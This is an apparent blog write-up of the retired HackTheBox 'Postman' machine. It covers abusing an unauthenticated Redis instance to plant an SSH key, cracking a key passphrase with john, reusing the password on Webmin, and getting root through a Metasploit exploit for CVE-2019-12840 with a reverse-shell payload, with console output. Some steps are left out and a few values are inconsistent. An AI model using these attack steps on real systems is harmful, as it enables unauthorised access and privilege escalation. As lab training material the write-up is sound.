Postman just retired on HackTheBox. It was an easy difficulty box. It was quite quick but nice to solve. It can be really interesting if you want to learn and play with the now widely used Redis.
Tl;Dr: The user flag consisted in exploiting a redis instance accessible without authentication. From this instance you would bruteforce the passphrase of a SSH key found in a backup folder and use its password to pivot from redis user to Matt user. Using the same password we could login to a Webmin panel and use an exploit (CVE-2019-12840) to achieve remote commands execution as root and grab the flag.
Alright, let’s get into it!
First thing first, let’s add the box IP to the host file:
A piece of the puzzle looked missing to me. When this happen I like to restart my recon process from the beginning, to make sure I didn’t forgot anything.
Let’s start by re-running nmap, but this time on the top 10,000 ports:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
[[email protected] ~]$ nmap -sV -sT -sC --top-ports 10000 postman.htb Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-22 20:39 CET Nmap scan report for postman.htb (10.10.10.160) Host is up (0.035s latency). Not shown: 8316 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: The Cyber Geek's Personal Website 6379/tcp open redis Redis key-value store 4.0.9 10000/tcp open http MiniServ 1.910 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Nmap done: 1 IP address (1 host up) scanned in 150.41 seconds
Aah that’s interesting! A new service appeared. A redis instance running on port 6379. That’s probably the missing piece of our puzzle.
Being new to redis I spent a bit of time reading articles and documentations on redis before starting anything. During my research I stumbled upon this very interesting article: “A few things about Redis security”.
The article, written by one of the redis dev, explain how to “crack Redis for fun and no profit“ on exposed redis instance with no authentication activated.
Maybe it’s our case ? First, let’s check if the redis instance need authentication:
1 2 3 4 5 6 7 8 9 10
[[email protected] ~]$ telnet postman.htb 6379 Trying 10.10.10.160... Connected to postman.htb. Escape character is '^]'. echo"Hey no AUTH required!" $21 Hey no AUTH required! quit +OK Connection closed by foreign host.
Well, indeed not auth is needed to access this redis instance, that’s good news. Let’s follow the article to see if we can exploit it the same way the author present in his article.
The next step described in the article is to write our own SSH Public key into ~/ssh/authorized_keys in order to gain access to the server.
First step is to generate a ssh key pair that we will add to the authorized_keys of the server:
[[email protected] ~]$ ssh-keygen -t rsa -C "[email protected]" Generating public/private rsa key pair. Enter file inwhich to save the key (/home/hg8/.ssh/id_rsa): ./id_rsa Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in ./id_rsa. Your public key has been saved in ./id_rsa.pub. The key fingerprint is: f0:a1:52:e9:0d:5f:e4:d9:35:33:73:43:b4:c8:b9:27 [email protected] The key's randomart image is: +--[ RSA 2048]----+ | . O+.| | . o o..o*o| | = . + .+ . | | o B o . | | . o S E . | | . o | | | | | | | +-----------------+
I quote the author on this part since he explains way better than me:
Now I’ve a key. My goal is to put it into the Redis server memory, and later to transfer it into a file, in a way that the resulting authorized_keys file is still a valid one. Using the RDB format to do this has the problem that the output will be binary and may in theory also compress strings. But well, maybe this is not a problem. To start let’s pad the public SSH key I generated with newlines before and after the content:
* Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1 [email protected]:~$
Pivot Redis -> Matt
Ok, now we have access to the machine with redis user, let’s now find the user to pivot to :
1 2 3
[email protected]:~$ ls -l /home/Matt/ total 4 -rw-rw---- 1 Matt Matt 33 Aug 26 03:07 user.txt
Matt is our user. Let’s do a bit more of recon to see if we can find additional informations.
While searching around, we find an interesting backup file:
[[email protected] ~]$ john --wordlist=~/SecLists/Passwords/Leaked-Databases/rockyou.txt id_rsa.hash Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status computer2008 (id_rsa.bak) 1g 0:00:00:12 DONE (2019-12-22 21:16) 0.08264g/s 1185Kp/s 1185Kc/s 1185KC/s *7¡Vamos! Session completed
Good, we got a passphrase here! Let’s try to login again:
Now that we have access to our user, let’s make a bit of recon to see if we can escalate our privileges to root.
After a while we can not find anything worthy onto Matt account. Once again, when being stuck let’s go back at beginning to make sure we don’t forget anything. Remember that Webmin instance ? It must be there for a reason…
Knowing that Matt reuse his password maybe we can be able to connect to Webmin using the same credentials (Matt:computer2008) ?
Let’s try to login:
Success! We are in...
From this control panel we can not access a lot… Only the Software Package Updates page. We can not seem to do anything interesting from there.
Knowing from the nmap result and the page footer, the Webmin version is 1.910, let’s see if some exploit have been published:
Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD yes Webmin Password Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 10000 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Base path for Webmin application USERNAME yes Webmin Username VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Id Name -- ---- 0 Webmin <= 1.910
msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 10.10.10.160 RHOSTS => 10.10.10.160 msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 10.10.10.10 LHOST => 10.10.10.160 msf5 exploit(linux/http/webmin_packageup_rce) > set username Matt username => Matt msf5 exploit(linux/http/webmin_packageup_rce) > set password computer2008 password => computer2008 msf5 exploit(linux/http/webmin_packageup_rce) > set payload cmd/unix/reverse_python payload => cmd/unix/reverse_python
Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD computer2008 yes Webmin Password Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.160 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 10000 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Base path for Webmin application USERNAME Matt yes Webmin Username VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_python):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.10.15.123 yes The listen address (an interface may be specified) LPORT 8585 yes The listen port SHELL /bin/bash yes The system shell to use.
[*] NICE! Matt has the right to >>Package Update<< [+] 10.10.10.160:10000 - The target is vulnerable. msf5 exploit(linux/http/webmin_packageup_rce) > run
[*] Started reverse TCP handler on 10.10.10.10:8585 [+] Session cookie: 0712c463a268f71262aa809eb4f41928 [*] Attempting to execute the payload... [*] Command shell session 1 opened (10.10.10.10:8585 -> 10.10.10.160:38146) at 2019-11-05 02:07:59 +0100
id uid=0(root) gid=0(root) groups=0(root) cat /root/root.txt a2xxxxxxxxxxxxxxxxxxxxxce
That’s it folks! As always do not hesitate to contact me for any questions or feedbacks!